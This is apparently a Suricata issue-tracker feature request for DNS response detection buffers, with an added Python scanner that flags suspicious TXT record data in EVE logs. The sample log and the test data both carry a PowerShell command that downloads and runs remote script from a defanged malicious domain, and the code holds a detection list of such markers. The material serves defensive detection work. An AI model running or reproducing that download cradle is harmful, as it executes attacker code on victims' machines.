Feature #2448

open

Add additional buffers for DNS Responses

Added by Jack Mott over 6 years ago. Updated about 1 year ago.

Status: New
Priority: Normal
Assignee:
Target version:
Effort:
Difficulty:
Label: Beginner, Protocol

Description

Hi,

It would be nice to be able to include additional buffers for the DNS protocol responses to help write more efficient and effective signatures.

I think buffers for sections like rdata and rrtype should be included to cover things like data in TXT Records, but it could be expanded to cover the other sections of the response.

{  
   "timestamp":"2018-02-14T19:12:58.760866-0700",
   "flow_id":345727363089610,
   "pcap_cnt":4,
   "event_type":"dns",
   "src_ip":"8.8.8.8",
   "src_port":53,
   "dest_ip":"192.168.0.105",
   "dest_port":49153,
   "proto":"UDP",
   "dns":{  
      "type":"answer",
      "id":2,
      "rcode":"NOERROR",
      "rrname":"shinobotps1[.]com",
      "rrtype":"TXT",
      "ttl":3600,
      "rdata":"powershell IEX (New-Object Net.WebClient).DownloadString('hxxps:\/\/shinobotps1[.]com\/download_get.php');" 
   }
}

Thanks!
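Until a DNS response buffer exists, the same detection can be done on the EVE JSON the ticket pastes. The following is an added example, not code from the ticket or from Suricata: it reads EVE lines, pulls TXT rdata from the flat "dns" layout shown above and from the answers array of the v2 EVE dns format, and flags payloads carrying script-download markers. The marker list and the sample log lines are constructed for this example.

```python
import json
from typing import Iterator, List, Tuple

# Constructed marker list for this example; tune it to your environment.
SUSPICIOUS_RDATA_MARKERS = ("powershell", "IEX", "DownloadString", "Invoke-Expression")


def txt_answers(event: dict) -> Iterator[Tuple[str, str]]:
    """Yield (rrname, rdata) for every TXT answer in one EVE dns event.

    Handles the flat v1 layout (rrtype/rdata directly under "dns", as in the
    ticket) and the v2 layout, where each answer sits under dns.answers.
    """
    dns = event.get("dns", {})
    if event.get("event_type") != "dns" or dns.get("type") != "answer":
        return
    records = dns.get("answers") or [dns]
    for rr in records:
        if rr.get("rrtype") == "TXT" and "rdata" in rr:
            yield rr.get("rrname", dns.get("rrname", "")), rr["rdata"]


def flag_txt_cradles(eve_lines: List[str]) -> List[dict]:
    """Scan EVE JSON lines; return one finding per TXT answer with markers."""
    findings = []
    for line in eve_lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip truncated or garbled lines instead of aborting the scan
        for rrname, rdata in txt_answers(event):
            hits = [m for m in SUSPICIOUS_RDATA_MARKERS if m.lower() in rdata.lower()]
            if hits:
                findings.append({"flow_id": event.get("flow_id"), "src_ip": event.get("src_ip"),
                                 "rrname": rrname, "markers": hits})
    return findings


# Constructed sample lines: a v1 answer mirroring the ticket, and a benign v2 SPF answer.
SAMPLE_EVE = [
    '{"timestamp":"2018-02-14T19:12:58.760866-0700","flow_id":345727363089610,"event_type":"dns",'
    '"src_ip":"8.8.8.8","dns":{"type":"answer","id":2,"rcode":"NOERROR","rrname":"shinobotps1[.]com",'
    '"rrtype":"TXT","ttl":3600,"rdata":"powershell IEX (New-Object Net.WebClient)'
    '.DownloadString(\'hxxps://shinobotps1[.]com/download_get.php\');"}}',
    '{"event_type":"dns","flow_id":2,"src_ip":"8.8.4.4","dns":{"version":2,"type":"answer",'
    '"rrname":"example.test","answers":[{"rrname":"example.test","rrtype":"TXT","ttl":300,"rdata":"v=spf1 -all"}]}}',
]

if __name__ == "__main__":
    for f in flag_txt_cradles(SAMPLE_EVE):
        print(f)
```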


Related issues: 4 (4 open, 0 closed)

Related to Suricata - Feature #2198: Extend the DNS parser to accept dns_response keyword in signatures (New, Community Ticket)
Related to Suricata - Task #4097: Suricon 2020 brainstorm (Assigned, Victor Julien)
Related to Suricata - Feature #7012: Add dns.response sticky buffer (New, Nathan Scrivens)
Related to Suricata - Feature #5642: DNS: parity between log fields and detection (New, Jason Ish)
